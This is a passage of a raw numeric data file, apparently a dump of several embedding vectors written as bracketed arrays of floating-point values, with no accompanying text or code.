1248066,-0.008260573,0.00035939578,0.012415385,0.02478235,-0.07302366,0.021736812,-0.08000651,-0.012479912,-0.055192366,0.0061710402,-0.031543624,-0.003189415,-0.052458428,-0.029832141,-0.058716685,-0.059117153,0.033548888,0.05278353,0.008451236,0.004666994,-0.03182433,0.0162235,0.017738357,0.021750001,0.06837703,0.044729825,-0.07862709,0.022537788,0.013258599,-0.0038582392,-0.011042905,0.0076231803,0.024091884,-0.061458718,-0.041043863,0.042349618,-0.043053288,0.028388932,0.03299914,-0.04359666,-0.0017151678,-0.06455211,-0.011369839,-0.012464063,0.010090925,-0.00841869,-0.0018521855,0.026812842,-0.026941657,-0.020270173,0.01524846,-0.008170497,0.012489451,-0.05045939,-0.014274512,-0.04594784,0.031305183,0.031595565,-0.017695842,0.014891654,0.08973315,0.00045819164,0.05466255,-0.02838515,0.015043479,0.035283662,0.003948747,0.029538665,-0.007813588,0.03513964,-0.043915592,0.018453142,-0.012397904,-0.016093412,-0.00075604155,-0.0012246346,-0.07175043,0.056573477,-0.03709398,0.043611508,-0.023687202,-0.07504476,-0.06007564,-0.030103244,0.03209229,-0.04143626,-0.019338025,-0.06709192,0.00061144924,-0.07152737,0.023589741,-0.03878853,0.036268976,0.02783855,0.050514024,0.023086306,-0.020895574,-0.006444592,0.043831863,0.06850176,-0.029288631,0.027744737,0.0659947,-0.008605445,0.006146888,0.01079843,0.12275694,0.026744379,0.004148035,-0.025784528,0.012178855,0.00048361864,-0.039092418,-0.046071913,-0.008722656,0.029674245,0.011222287,-0.039256044,0.00934388,0.0039145867,-0.014959137,0.025098743,-0.012655338,-0.031371735,-0.0037351751,0.018857876,0.0062279906,0.016192708,-0.05096681,-0.0013669427,0.054287072,0.021584734,0.06883513,0.025490537,-0.06041146,0.03186719,0.022300974,0.0130786775,-0.0023674765,0.019560326,-0.025518483,-0.009194175,0.027535906,-0.041048132,-0.049598917,0.015510118,-0.049177527,-0.015178459,-0.013714269,0.0027675051,0.02003241,0.018521048,0.009404216,0.0058980808,0.05669548,-0.052975375,0.043697253,0.0091518,0.014169493,0.021103559,-0.008487797,-0.008543477,0.05012378,0.020661937,-0.059056398,-0.046032403,0.04990949,-0.009221409,0.061751325,-0.0030809478,0.034767665,-0.0077837813,0.0362403,-0.039186668,0.048869736,0.016415263,-0.0069377283,-0.083379015,-0.015438905,-0.008738876,0.016541334,0.056301154,-0.055796918,-0.0044666543,-0.0314087,-0.014866237,-0.000017918283,-0.04027049,0.036036726,-0.004772032,-0.0024615133,0.012644331,-0.003135285,-0.019336965,-0.04474352,-0.017136306,0.05003383,-0.006349601,0.0074350205,0.0074634436,-0.040143408,-0.012280637,0.07716437,0.025190383,-0.04667683,-0.012205512,-0.0027334564,0.013710528,0.011682442,-0.0011111328,0.019040983,-0.028482368,0.08222898,0.08253593,-0.015583127,0.0471752,0.006933706,0.024919527,-0.024605148,-0.01895017,0.005364848,-0.049186844,-0.008751155],[0.029311948,0.09492035,-0.16194037,-0.026562076,0.108573064,0.008432416,0.05212696,0.016742935,-0.007806015,-0.0071342024,0.029541582,0.008248957,0.08099936,-0.0034591248,-0.010186752,-0.03833922,0.019167645,-0.071998,-0.013525373,-0.028988268,-0.053086188,-0.017816642,-0.049605977,-0.040916078,0.048981268,0.020185998,-0.073317274,-0.042435985,-0.016839288,0.023533659,0.018485526,-0.066012084,-0.02046489,-0.010319265,-0.07489827,-0.014821192,0.07309461,0.033951838,-0.016437165,0.0120789455,0.03587,-0.005888198,0.034973234,-0.04709166,0.026843121,0.033661697,0.009813678,-0.010580014,0.08243639,-0.103463225,-0.007107604,0.028585328,0.055896886,0.025885431,0.06643955,0.034768894,-0.017479816,0.059697647,0.03503607,-0.004858392,0.061831206,0.063755445,-0.046108596,0.033958912,0.040355835,-0.054610316,-0.029737465,0.06771529,-0.023046793,-0.035894595,0.012868363,-0.060495183,0.014212558,0.053571925,-0.07257689,-0.032590542,-0.012149165,0.024273323,-0.013117681,0.04581817,-0.0074878065,-0.018183375,0.068057336,0.025097672,0.02444627,-0.036531147,-0.07058009,0.007771512,0.028235158,0.09916429,0.0095171705,0.009493737,0.01167134,-0.0104513345,-0.06333748,0.055661704,0.03246074,-0.0005341144,-0.02856488,-0.013150197,-0.02551197,0.0053643826,-0.01802045,0.016115172,0.00834248,0.03628088,0.0051329704,0.002553952,-0.009611914,0.025967857,-0.0710081,0.06251566,-0.025744516,-0.019915879,-0.012430542,0.010365823,0.03086698,0.0021593687,-0.011710085,0.050541908,0.012452533,0.0066114017,0.005647025,0.036787648,-0.012191384,0.00068756874,-0.08208982,0.020165235,-0.029067442,-0.039082453,-0.048889045,-0.049673934,-0.037350606,-0.011936505,-0.0003165663,0.04388088,-0.058121722,-0.006492118,0.019604966,0.04225707,0.029317142,0.03751698,-0.021227956,0.0118065,-0.02682409,-0.04315787,-0.0010179613,-0.0054988875,-0.06414406,0.027473584,0.054619808,0.0008768295,0.02785609,-0.008201509,0.03444548,-0.017198555,-0.0026170264,0.038271625,0.017244726,-0.012501527,0.04881419,0.018812714,-0.09447442,0.04734353,0.014381122,-0.028203772,0.010391121,0.005593682,-0.0025837785,0.058992535,-0.09172516,-0.05628548,0.04369493,0.009262379,0.016438626,-0.014012183,0.06939904,-0.060009997,0.029668972,0.0052348203,0.034812983,-0.05391654,0.025866082,0.03734895,0.0007442952,-0.020354688,0.0087802475,0.009737042,-0.0083000725,-0.020028394,0.040574685,-0.0034989796,-0.051230717,-0.043069076,-0.044316344,-0.041228592,0.030096458,0.020718979,0.02160627,0.0071948995,-0.035158455,-0.01784093,-0.04689373,-0.021063155,-0.02062537,0.06649525,0.017614268,0.013285289,-0.021769565,-0.0015252506,0.04499479,0.007828178,0.045523956,0.02867427,0.01848129,-0.03153875,0.0057046562,-0.03138584,0.017939787,0.055178728,0.022337321,-0.011273165,-0.031947453,0.00636653,0.03531448,0.012585016,-0.05260758,-0.013089117,-0.010853197,0.0043915035,0.012599954,-0.12709069,0.06686253,0.013167081,0.042181082,0.04476074,0.01839263,0.022989068,0.008422064,0.040900715,0.018003177,0.048811145,-0.015449431,-0.014785416,-0.04737165,-0.049613696,-0.009224085,-0.031202216,0.021661593,0.048257057,0.032032702,0.003767691,-0.0063993307,0.037129384,0.025886565,0.005945977,0.0051143183,0.0281891,0.0350582,0.026143683,0.05013137,-0.06040984,0.017021086,-0.053495526,-0.079793595,-0.051056217,-0.06678001,-0.024506232,0.030538013,0.0033620899,0.03724612,0.033463813,0.05074432,0.039685074,-0.0013454556,0.018689593,0.0013587787,-0.03277575,-0.0035954828,0.029798787,-0.02936927,-0.030628009,-0.07843674,0.06581157,-0.0027108006,0.03929996,0.0066699763,-0.029464645,0.0039847963,0.022613654,-0.004359934,-0.021588713,0.0048924168,0.04088646,-0.035729222,0.021851579,0.055793107,-0.03493564,-0.005163941,-0.039412733,0.043306194,0.04809167,0.08866073,0.0326162,-0.039398313,-0.021150395,-0.017701365,-0.007886707,0.007970364,-0.003626849,-0.066296935,-0.014248877,0.011495168,-0.008522172,0.0076277093,-0.004639115,0.04307146,0.04482581,0.05928004,-0.0051779267,0.015423847,-0.011603016,-0.012579969,-0.08177652,-0.018985882,0.076913975,-0.028254427,-0.013121956,-0.042971324,-0.044202738,0.057438154,0.033581212,0.029166207,-0.011013994,-0.015332293,0.021541445,0.031242225,0.02054716,0.009079819,-0.0027544864,-0.008043199,-0.0050318833,0.04347769,-0.052244,0.012960918,0.00995379,-0.040324792,-0.02556408,0.021684567,0.0028692656,-0.019549193,0.03110075,-0.030309241,0.03900456,0.045052443,0.0014550526,0.024310332,0.05572507,0.03650545,-0.02721531,0.030394,-0.0018082317,0.0048773265,-0.007007316,0.005753915,0.012536639,0.0066826446,-0.006318203,-0.0058178916,-0.01101271,-0.020652248,-0.0105554955,0.02101667,0.038423482,-0.0037429775,-0.0073824874,-0.08362178,-0.024922747,-0.039442096,-0.028350627,0.0118655525,-0.02069624,-0.029243805,-0.015606164,0.041306704,0.023974607,0.02084802,-0.07593649,-0.016356565,0.0270144,-0.010826512,-0.01257514,-0.04660129,0.027698291,0.008652364,-0.07277572,-0.0008787981,0.033452842,-0.01179583,0.039367467,-0.040883075,-0.07063165,0.030295078,-0.011097894,-0.007824536,0.026179476,-0.03675387,-0.034664292,0.031713672,0.016664352,0.03840357,0.03841016,-0.060929146,-0.051276006,-0.0032371697,0.017779917,0.036936942,-0.03120712,-0.022473024,-0.030817753,0.040348805,0.034862638,0.016402187,0.021891378,-0.009347832,0.01687336,0.008008776,0.02487544,0.02599872,-0.01718228,0.036890376,-0.011382365,0.03583443,0.0009636942,-0.00057115755,0.031789694,-0.00065037445,0.050879247,-0.024066506,0.052955087,0.010741715,-0.015483794,-0.031487975,-0.018027984,0.009819082,0.07999375,0.034228504,-0.017911427,-0.07803004,0.042854544,-0.021207659,0.016630054,0.00005252719,-0.0029191975,0.045651246,-0.027219221,0.014050207,0.021773595,0.006212891,0.043496903,-0.02646304,-0.0019373181,-0.06742225,0.059029628,0.055139095,-0.0033736185,0.000026831443,-0.05528798,0.05339838,0.07558716,-0.06934332,-0.0028151951,0.057914156,-0.038663097,-0.030291758,0.010900843,-0.003831517,-0.00051383016,-0.03851182,0.0482263,0.012816984,0.005128398,-0.026171692,0.008201704,-0.019816764,0.032731153,0.013516517,-0.02477204,-0.020295402,0.010930503,0.036229998,-0.00990632,0.0089271115,-0.035140477,-0.04076964,-0.01279281,-0.027813604,0.037404053,0.019359779,0.025791576,0.004326566,0.05333702,-0.010067219,-0.027939662,0.010104744,-0.013909888,0.03316805,-0.09744919,-0.03707195,-0.027508968,-0.025364045,0.008777205,0.031029398,0.005751775,0.05888228,-0.019897666,0.048153404,0.00856458,-0.074474104,0.017422859,0.03942552,-0.042188182,0.00579488,-0.0030465678,-0.03514208,0.023426233,0.010491106,-0.08870148,0.0106566325,0.01694674,0.009904751,0.0033842113,-0.023761934,-0.007073206,0.021346802,0.00868234,-0.0278047,-0.010657203,0.037412446,0.0069586597,0.018010926,0.031105958,0.036897823,-0.009130013,0.034472354,-0.0024105338,-0.034904554,0.030638857,0.01152822,-0.116599485,0.03132877,-0.05678527,0.00571947,-0.037697814,0.026697425,-0.01699973,-0.02308232,-0.029928701,-0.011944477,-0.0063659726,-0.036959864,-0.02022974,0.044511076,0.005479557,0.012417158,-0.03310261,-0.0088531645,-0.02042842,0.01827429,0.004470479,-0.0029661627,-0.03780052,0.008865949,-0.045885637,0.014392786,0.0025561613,-0.0069593783,0.03407338,-0.016033875,-0.048910297,0.069534585,-0.052340996,0.023850303,0.02759121,0.02492447,0.010929304,-0.0716194,0.015486359,0.0102351755,-0.07092234,-0.0050133117,-0.005799769,0.0434431,-0.054848373,-0.03357671,0.021233508,0.0071457876,-0.0047815903,-0.062038418,-0.05713931,0.015962176,0.008404982,0.034757003,-0.047698554,0.061743177,0.0638883,0.0006529669,0.033147648,-0.028408764,-0.018082764,0.0073917047,0.0063714995,-0.011776842,0.012965222,0.0027561716,-0.059137,0.06176297,-0.011604115,-0.03222088,-0.049625795,-0.031698234,-0.038150616,0.023940137,-0.031975683,0.019126052,-0.022681035,-0.022055846,-0.013775761,0.028338708,0.036857534,-0.020822411,-0.012994329,0.004386806,-0.03793228,-0.058508,0.005402689,-0.008003805,0.03895205,-0.039911456,0.060071707,0.0339451,-0.058745537,-0.025014536,0.038400114,0.052642357,-0.04375148,0.034317758,0.052641995,0.037106022,-0.010420191,0.08266849,0.05627691,-0.028492048,-0.0076312385,0.0247082,-0.012669479,0.03694833,-0.037740543,0.028556664,-0.027481573,-0.030829478,-0.024510067,0.010279007,0.002927549,-0.010347314,-0.014283925,0.016777495,0.009767172,-0.016594304,-0.026134118,0.07546821,-0.016421568,-0.04539948,-0.025407746,0.00034277356,0.0058430606,0.021945616,0.01293534,0.000683601,-0.0538744,-0.03178722,0.017576057,0.039855275,-0.04679656,-0.02086687,-0.040048707,-0.012766885,-0.01007849,-0.012016621,-0.0015061354,-0.012927417,-0.043440193,0.027850041,-0.0133899795,0.04057231,-0.0022635916,-0.0016371348,-0.03563856,-0.013504197,0.0017946522,-0.030193646,0.05744934,-0.020254634,0.020632226,-0.001526243,0.026525121,0.033394873,0.012331734,-0.005556719,-0.014262738,-0.017075935,0.024839798,-0.036488652,0.053186275,0.05764171,-0.012969825,-0.027942587,-0.037001226,-0.0063971607,0.025426079,0.04710301,-0.045267925,-0.03722222,-0.0049726344,0.008314305,-0.013742044,0.06046705,-0.030169759,-0.01528962,-0.025400346,-0.024150277,-0.013513259,-0.040562857,0.047924586,0.021181332,0.005475955,-0.0019199137,-0.022831198,-0.048506394,-0.026292905,-0.04058156,-0.028762326,-0.005837296,0.008254319,-0.0028628209,-0.023074029,-0.053136785,0.06352531,0.020877985,-0.057234928,0.019787008,-0.016412327,-0.044373207,0.013419467,0.01231536,-0.0032655958,0.05253047,0.026083736,0.11358126,0.010918076,0.02025339,-0.03081606,0.049400106,0.0004641491,-0.02537712,-0.029392844,-0.04097761,-0.012892633],[-0.027697938,0.05381877,-0.17259525,-0.037179984,0.069822416,-0.03576113,0.11146673,0.028425423,-0.0005804352,-0.039695878,0.03491952,0.027255287,0.10578103,0.017004417,-0.0114795845,0.009726478,0.022041082,-0.043215424,-0.034670375,0.049290266,-0.005933206,-0.038440127,-0.029122664,-0.042910155,0.05846642,-0.0056495145,-0.06752283,-0.009502681,0.011140706,0.038448192,0.019916024,-0.06926182,-0.0009293401,0.008734688,-0.069321066,-0.023853034,0.046424557,-0.008156762,0.003534789,0.02483482,0.018802924,0.03535174,0.012066404,0.00075421605,-0.009651676,0.0018986089,0.05253995,0.002177934,0.02384483,-0.050317075,-0.007970134,0.0025831857,0.039282028,0.014393657,0.08885115,0.07176255,-0.012801745,0.044842005,-0.009409974,-0.07004878,0.12019153,0.032383017,-0.08382822,0.020714283,-0.0032578267,-0.018930404,-0.013128491,0.056627367,0.010348259,-0.016098093,0.030146947,0.04400179,-0.018383594,0.035952747,-0.052837893,-0.03181737,0.0024536916,-0.047507383,-0.050364792,0.049493976,-0.004239223,-0.020926952,0.088712566,-0.05186851,0.04293922,-0.0094346935,-0.004922106,0.027410299,-0.066045485,0.05891057,0.012820545,0.0043321038,0.07018333,0.008361066,-0.05295366,0.026667323,-0.025573658,0.03724975,-0.035608616,-0.0016967684,-0.035249766,-0.012319751,0.03888904,-0.0022313471,-0.0134925265,0.058015563,0.045544785,-0.014196813,-0.033936907,0.0014121556,-0.047407046,0.027225353,-0.034524977,-0.002128429,-0.0570637,-0.029989408,0.05367394,-0.018522192,-0.007558693,0.016711295,0.003068733,-0.047187757,-0.0014316771,0.040713992,-0.016990112,0.018040448,-0.08175353,0.025047423,-0.03261688,-0.03732297,0.006821035,-0.027840901,-0.040305894,-0.0037738895,0.02730742,0.06763315,-0.030171888,-0.0010507726,0.014092599,0.012293449,-0.014600458,0.030253163,-0.0022519664,-0.027608018,0.021833839,-0.025318634,-0.00808302,-0.009552441,-0.038246132,0.02381265,0.009799049,-0.01817726,-0.025960539,0.004564355,0.035405368,-0.017187843,-0.02531222,-0.029278759,0.012154096,0.00010613891,0.02557501,0.002141694,-0.026069526,0.035972856,-0.00690012,-0.049807996,0.037290037,0.049660515,0.007752065,-0.0059008603,-0.065528385,-0.04525239,0.0030255108,-0.042073473,-0.0069688866,0.042954568,0.07747203,-0.02291236,-0.02871144,0.005658848,0.058410827,-0.049797345,0.047732405,0.036893945,-0.013763879,-0.008132706,-0.02283723,0.018632704,-0.014090746,-0.0469347,0.019710254,0.008151851,-0.06708987,-0.018827295,-0.027442371,-0.0551899,0.04837139,-0.022648048,0.030194506,-0.009751143,-0.046584997,-0.04785909,-0.05431067,-0.019194031,-0.021873003,0.05178689,0.03460959,0.014571915,-0.044593446,0.032593265,0.046603087,0.025150305,0.018876307,0.054787394,0.009295362,-0.018366437,0.0029843894,-0.027145186,-0.020838507,-0.012122076,0.01261078,-0.0366189,0.00025150372,-0.004618675,0.0075908704,0.00735948,-0.016779521,-0.014765572,-0.018120881,0.023662366,0.0020097585,-0.04760542,0.026318956,-0.010181919,0.02843253,0.029799402,0.0079716435,0.041782286,-0.0018074323,0.02336272,-0.007933594,0.06080941,-0.0131413955,-0.01977767,-0.03305246,-0.045459986,0.039768532,-0.011514966,-0.032398034,0.04686231,0.0103120655,0.023402058,0.008941025,-0.017755656,0.02266196,-0.04201417,-0.049887717,-0.0022010603,0.024923202,0.006806018,0.04628446,-0.010588674,0.022734247,0.002878934,-0.021171283,-0.043999307,-0.004332859,-0.019446451,-0.030701013,-0.013316464,0.038725946,0.021814505,0.026523344,0.04234822,-0.019334866,0.03477023,-0.026835741,-0.022404332,-0.010530666,0.029789696,-0.014491497,-0.017766535,-0.033257972,0.014306371,-0.007802176,-0.012535975,0.0062595247,-0.021911653,0.016325215,0.01712161,0.003019298,-0.009512366,0.00056939974,0.02623718,-0.013659009,0.013148044,0.047613833,0.0076792706,0.014553711,-0.031015389,0.015210851,0.04667523,0.02972882,0.011401345,-0.006712696,-0.0042026057,0.004284666,-0.01743238,0.010857821,0.015038886,-0.054450046,-0.019492298,-0.057898648,-0.010648363,-0.043572597,-0.021820668,0.012264111,0.029679872,0.031649318,-0.031427436,0.026242012,-0.051470257,0.0049503935,-0.047523025,-0.006029473,0.0649864,-0.011116081,0.030925395,-0.0058653983,-0.026885865,0.05032896,0.036186665,0.012229051,-0.019051628,-0.0053998316,0.0287136,-0.009723718,0.03974181,0.016208759,0.027742755,0.03906895,-0.0263802,0.022723846,-0.020483512,-0.004992753,0.044299893,-0.00056488346,-0.019587949,0.06366674,0.026717665,-0.015951635,0.016896836,-0.015050937,-0.022878453,0.062450655,0.03120189,0.0710984,0.04079773,0.025558002,-0.013607278,0.025016425,0.002703301,-0.009037446,-0.007891336,-0.010424886,0.012390152,0.044344924,-0.038959287,0.009140999,0.022698233,-0.011413191,0.004219365,-0.007817034,0.015507295,-0.052997246,0.02110463,-0.036506034,0.017564269,0.017742688,0.0044137184,0.0023213578,0.0012660755,-0.020599887,-0.0018718692,0.016820926,0.009753261,0.027310006,-0.026441423,0.022173421,0.019071996,-0.027452216,-0.07152185,-0.053546187,0.015778875,0.018331323,-0.034562435,0.017375162,0.0020045256,-0.0052223457,0.076678626,-0.05442198,-0.07053167,0.021564677,0.007032467,-0.0059061046,0.04325542,-0.047318425,-0.035800733,0.028114628,-0.012373687,0.04731878,0.058466695,-0.023832971,-0.08343688,0.004862939,0.010509467,0.039116636,0.034297075,-0.012837006,-0.03370018,0.030596485,0.027609307,0.040512577,0.004189606,0.013082885,0.016764259,0.01750042,0.035689805,0.051907595,-0.09388482,0.05714479,0.028943373,0.021016197,0.005055805,-0.036710545,0.0019628555,0.0134389,0.017917918,0.000014201295,0.029499222,0.031276826,-0.038572792,-0.06373356,-0.055896435,0.011003164,0.038009785,0.0604035,-0.053192787,-0.07491133,0.030486926,0.017403824,0.0041768984,0.06710961,0.037010375,0.10232867,-0.046922725,0.014308523,0.029183984,0.05823712,0.02942719,-0.017428325,0.015634988,-0.030194938,0.026775572,0.036257878,-0.00928556,0.0029860444,-0.08613432,0.02348615,0.06642711,-0.036480784,-0.047148783,0.031660102,-0.038248662,0.000129443,0.014626665,-0.029244909,-0.01779362,0.049547236,0.057276454,-0.006458472,-0.04593381,-0.049908135,-0.03591271,-0.02218252,0.020133775,0.020405412,-0.041385107,-0.01949944,-0.051459502,0.056514822,0.02964216,0.028900294,-0.041178294,-0.017731393,-0.012262602,-0.022875903,0.041408632,0.043839123,-0.008783416,-0.013488407,0.02594422,-0.009711065,-0.001725677,0.008720052,-0.017138237,0.08257451,-0.078946546,-0.066922046,-0.0018880523,0.01561451,0.03538913,0.019804394,0.018821044,0.03114301,-0.07734669,0.03570913,0.036074486,-0.017895004,0.005918419,0.03499873,-0.02230329,-0.04532275,-0.0073643145,-0.05613523,0.015052754,-0.01326527,-0.059107766,0.038754087,-0.009346591,0.03835015,0.06124112,-0.074348114,-0.009667017,-0.013437835,0.0062003597,-0.009793114,0.0073402487,0.019782413,0.024690714,-0.011595427,0.046074186,0.085585065,-0.051044047,0.02518765,-0.019052304,-0.045245487,0.014428679,0.00009439358,-0.07699329,0.004898289,-0.043069445,0.022786744,-0.021277186,0.0128683075,0.022705397,-0.023695622,-0.040318202,-0.0039520143,-0.042500693,-0.033168636,0.011591141,0.068818145,0.03254298,-0.005234653,0.013917001,0.0042332993,-0.013866501,-0.014666657,0.036819823,0.025389325,-0.09305117,-0.005804847,-0.01612478,-0.027731448,0.0027310364,0.019928113,-0.041548725,-0.03863253,-0.053198244,0.017359303,-0.054136116,0.023684694,0.015103237,-0.055923216,0.013083497,-0.0711745,-0.019614894,0.015138497,-0.03691088,-0.04131241,-0.00061661267,0.053372186,-0.027184099,-0.016619984,0.04608195,0.027141929,0.02651531,-0.041794874,-0.046197563,-0.020297207,0.013825203,0.057701875,-0.060430788,0.008485389,0.090601325,-0.019255545,0.040640175,0.024117198,0.0057264636,0.023439115,0.0059935474,0.0071044457,0.007214768,-0.0144736525,-0.021494815,0.03939099,-0.013623718,-0.013052352,-0.010410429,-0.0026866533,-0.044944238,0.017195461,-0.080410175,0.017651133,-0.02352372,0.00031740736,-0.055427674,0.033671588,-0.024665063,-0.04277762,-0.014881818,-0.045278344,-0.00382421,-0.07885472,0.024997484,0.004444617,0.042555768,0.002874718,0.06227901,0.026878888,-0.009020384,-0.0033975672,0.012256252,0.06803161,-0.048577685,-0.00078246056,0.09865671,0.025281005,-0.018283445,0.09174419,0.111240715,-0.010483525,-0.019967798,-0.014994945,0.013594881,0.019827925,-0.018976662,-0.017844487,-0.032093916,-0.01794043,-0.016635383,0.003951487,-0.0044882363,-0.0030461454,-0.034847826,-0.05118875,0.011666961,-0.042015914,-0.029908929,0.054551743,0.0293645,-0.042921264,-0.032754358,0.036397707,0.026106156,0.016590571,0.06707057,-0.030244058,-0.010403744,0.024695676,-0.01305868,0.04415226,-0.04113428,-0.008587721,-0.038014624,0.022159848,-0.024900854,-0.04650366,-0.011937005,-0.036970943,-0.027707508,-0.02799062,0.00536877,-0.036801174,0.0571256,0.02560942,-0.032458115,-0.031520914,0.07474298,-0.005747864,-0.007232971,-0.02154246,0.038197573,0.061017998,-0.023950074,0.027926747,0.0045431973,-0.01795161,-0.104303844,-0.039470088,-0.010728703,-0.013538897,0.07026382,0.017233126,0.023843495,-0.030784236,0.005147747,-0.03362256,0.04595508,0.02556579,-0.018324379,-0.017731642,0.05725603,0.006464643,-0.017050134,0.0019895688,-0.044767827,0.0068876436,0.0016518257,-0.021856772,-0.057985667,-0.039612148,0.042457152,0.015503762,0.0093353195,0.02441049,-0.026123848,-0.05842935,-0.015798276,-0.032167,0.01980708,-0.008439361,-0.014093739,0.014353025,-0.016398272,-0.00801824,0.04676216,-0.00216411,-0.034836113,-0.017514456,-0.014966026,-0.04764854,0.029546918,-0.019426448,0.039942008,0.03458409,0.019081801,0.09102533,0.023509515,0.0149864815,-0.02706462,0.050643306,0.0155620575,-0.0456413,-0.03520619,0.025259295,-0.041953973],[-0.02885832,0.039384075,-0.18206997,-0.06591614,0.042107496,-0.005985408,0.007763232,0.01264968,-0.05242796,-0.046402447,0.0072022458,0.028649483,0.091324754,0.044215314,0.017088393,-0.00983565,0.0027133175,-0.020813303,0.03627157,0.06590155,-0.051815774,-0.053227786,-0.03211746,-0.016771683,0.035670266,0.051786408,-0.028090965,-0.04651161,-0.043912873,0.0069390796,0.007077258,-0.0021011066,-0.054317825,0.05139229,-0.075423725,-0.04800984,0.02857416,-0.0026764285,0.014685604,0.052964512,0.05131578,0.027153157,0.007487671,-0.0103699975,0.02316517,-0.036871377,0.0470659,-0.022669105,0.03612612,-0.037665807,-0.0048332284,-0.023730377,0.021435058,0.023338204,0.12683398,0.015636493,-0.029418997,-0.0027529902,-0.0063267928,-0.07362595,0.06747833,0.033771694,-0.07549122,0.05633709,0.02552467,-0.019052599,-0.0533628,0.03663321,-0.0013771052,-0.091792926,0.04717386,0.00029479226,-0.02294246,0.035923623,-0.030544141,-0.016266037,-0.019423636,-0.06025509,0.01636282,0.03409026,0.038801633,-0.034870755,0.05372109,-0.0025928929,0.06109553,-0.019880893,0.01902285,-0.036635175,-0.032638688,0.024751265,-0.013099345,-0.042538755,0.05026053,0.0073772124,-0.06271375,-0.006653104,0.003085142,-0.013564063,0.012052863,-0.014398566,-0.062117122,-0.023800293,-0.02993794,-0.0047220727,0.0012407206,0.036813587,-0.027467247,0.024674531,-0.039814014,-0.02046929,-0.030605428,0.019296914,-0.017716927,-0.015995782,-0.03633266,-0.0025946773,0.020677269,-0.04536672,0.012415547,0.06316718,-0.04639876,-0.0053950436,-0.028753275,0.05266112,-0.025525758,0.008411909,-0.05543325,0.007764746,-0.03456355,-0.027919773,-0.0038799655,-0.020236017,-0.034433454,0.011340637,0.015273536,0.05394141,-0.02198593,-0.047930833,0.014024738,0.038329933,0.05369581,0.027291078,-0.009372494,-0.039912928,-0.015799753,-0.021002656,-0.01386488,-0.029893726,-0.034580443,0.012603513,0.059471354,-0.01262808,0.017012915,0.01617836,-0.043836247,-0.03879257,0.033804808,0.014084763,-0.012432462,0.0016078283,0.02675693,0.018051086,-0.0375818,0.064453565,0.013370335,-0.03002834,-0.027899683,0.06326254,-0.021353286,0.01304297,-0.056611575,-0.026227402,-0.0010875539,-0.018519906,0.07169478,-0.04487764,0.08073335,-0.0121223815,0.032683514,-0.035094712,0.031317655,-0.033718344,0.06551311,-0.016499892,-0.015377406,-0.043179523,0.01144116,-0.013178411,0.020189565,-0.046154924,0.04304866,-0.038873073,-0.06550332,-0.006510728,-0.04390326,-0.0410956,0.035826378,-0.030534597,0.015240402,-0.025817048,-0.008521927,-0.018942984,-0.058314253,-0.012163619,-0.09335979,0.07654685,0.028671555,0.024548486,-0.031183708,0.037342854,0.05929204,0.0066997632,-0.037964627,0.027642297,-0.010445176,0.02299089,0.0020589305,-0.014077488,-0.034987744,0.02140932,0.03850744,-0.045883924,-0.0037104548,0.039048754,0.01670651,-0.014901716,-0.025659602,-0.015783006,0.017402852,-0.010955868,-0.008978372,-0.049654447,0.09875053,-0.018009055,0.0063783294,0.03949934,0.01300759,0.047046237,-0.01277491,-0.01472803,-0.0008069519,0.022392714,-0.0010241912,0.04116438,-0.049799666,-0.0129242875,-0.01833744,-0.03371756,0.03361702,0.06240981,0.004552659,-0.004953864,0.039477367,0.022907369,0.028187854,-0.042279467,-0.07162872,0.043532692,-0.039153013,0.0023600978,0.041419726,-0.044116296,-0.03340288,-0.035565816,-0.019717174,-0.016596785,-0.012523813,-0.0053196875,0.030660918,0.013222199,0.053246573,0.036139514,0.012554318,0.034588676,-0.005069734,0.02512823,-0.024020901,-0.027939225,-0.008495682,0.019610224,-0.018237995,-0.021158308,-0.036249723,0.016615545,-0.00828795,0.019441096,0.0001142485,0.026239788,-0.009608171,-0.015367393,0.0069662416,-0.017254673,-0.042117137,-0.024572972,0.028085126,0.032910876,0.059515476,-0.0089524705,0.023467327,-0.06828771,0.02291559,0.036016375,0.058014233,0.07705908,-0.02280464,-0.009404364,-0.007882435,-0.012415914,0.031097677,-0.02128458,-0.060934607,-0.013461978,-0.026413566,0.05257823,-0.023210311,0.02681621,0.0051020947,0.040878937,0.02942822,-0.02293729,0.021900827,-0.037247114,0.04470459,-0.032349747,-0.01560757,0.06243503,0.0043464648,0.014718778,-0.008062631,-0.0017657563,0.038706016,0.028009633,0.021561224,-0.054515846,-0.040760037,0.04596261,0.03571086,0.025786225,0.007896866,0.040627383,0.036288694,0.024134154,-0.009880587,-0.053719014,-0.00026821037,0.017550873,-0.042831898,-0.021919098,0.07289965,0.05250778,-0.025096705,-0.0025915815,-0.021376336,-0.027367836,0.019916963,-0.010612428,0.011756525,0.057147432,0.013923717,0.0012200968,0.027291564,-0.010927773,0.013964799,-0.0483492,-0.01264878,0.043251712,0.015510409,0.0026156954,0.006047886,0.041441344,-0.00077133154,-0.027207991,-0.010561154,0.02040665,-0.016168976,-0.011290921,-0.07796253,0.03476512,-0.0063502947,0.018751122,-0.0035060453,0.010495277,0.0014012022,0.03969088,0.03432396,-0.008694393,-0.033091243,-0.039562237,0.046813544,-0.008221491,-0.025958922,0.008732995,-0.063366525,-0.02046933,0.019298682,-0.057236977,0.026654433,0.0383945,0.0033987532,0.050415337,-0.061514337,-0.07835629,-0.009478981,0.0073652198,-0.028219193,0.0037249457,-0.063354395,-0.025695903,0.03032017,-0.026090626,-0.008158805,0.0416032,-0.00063054264,-0.047169358,-0.005403136,0.020292087,0.023253528,-0.026167987,0.013973634,-0.026031159,0.018745016,0.042540897,-0.02849114,0.010124987,0.048331894,0.01823821,0.052226607,0.038736336,0.020847937,0.013138911,0.07554643,0.011450756,0.033649474,0.01245586,-0.006227007,0.001953221,0.03297523,-0.0022322377,-0.007553992,0.056778576,0.0373809,-0.089931436,-0.032752953,-0.0693117,0.006898873,0.0608349,0.006941713,-0.01275488,-0.06749081,0.08499566,0.010720933,0.007667128,0.012205967,-0.011411493,0.106184065,0.02145047,-0.009054222,-0.00727107,0.03173136,0.026567677,-0.0049534095,0.005223592,-0.052513115,0.012933235,-0.031140763,-0.013216279,0.009332657,-0.037715673,0.03391229,-0.0033352582,-0.05539866,0.029643716,0.033460528,-0.035889417,-0.027889192,0.040593315,-0.009291582,-0.01298889,-0.022913376,0.108092465,-0.0077833314,-0.022864658,0.016822724,-0.0130595155,0.059879474,0.00938823,0.048496865,-0.033109866,-0.019792693,-0.034669444,0.010418888,0.010108078,0.020057905,0.0017982627,-0.049899053,-0.021493135,-0.03557558,0.020279793,0.027833035,-0.0015975813,0.017906033,0.07105391,-0.020361518,0.032311805,-0.004120149,0.004635495,0.06297012,-0.061835025,-0.061286226,